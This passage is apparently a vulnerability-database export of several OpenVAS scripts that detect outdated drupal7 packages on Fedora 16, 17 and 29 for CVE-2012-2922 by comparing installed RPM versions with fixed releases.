See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864275\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:41 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8362\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8362\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:06:31", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16442", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-04T00:00:00", "id": "OPENVAS:864820", "href": "http://plugins.openvas.org/nasl.php?oid=864820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16442\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090861.html\");\n script_id(864820);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:11 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-16442\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16442\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1092", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865259", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1092\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097630.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865259\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:33 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-1092\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1092\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-d3f4eb1f9f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310875726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875726", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875726\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:17:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-d3f4eb1f9f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d3f4eb1f9f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5UKYWO2565POL24GEOZHWPYTYPN6T3S\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2018-d3f4eb1f9f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.60~2.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:56:58", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8362", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:864275", "href": "http://plugins.openvas.org/nasl.php?oid=864275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8362\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\");\n script_id(864275);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:41 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8362\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8362\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:52", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16442", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16442\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090861.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864820\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:11 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-16442\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16442\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8398", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864328", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864328", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8398\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864328\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8398\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8398\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-26T11:09:28", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1092", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865259", "href": "http://plugins.openvas.org/nasl.php?oid=865259", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1092\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097630.html\");\n script_id(865259);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:33 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-1092\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1092\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090859.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864824\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:22 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-16421\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16421\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = 
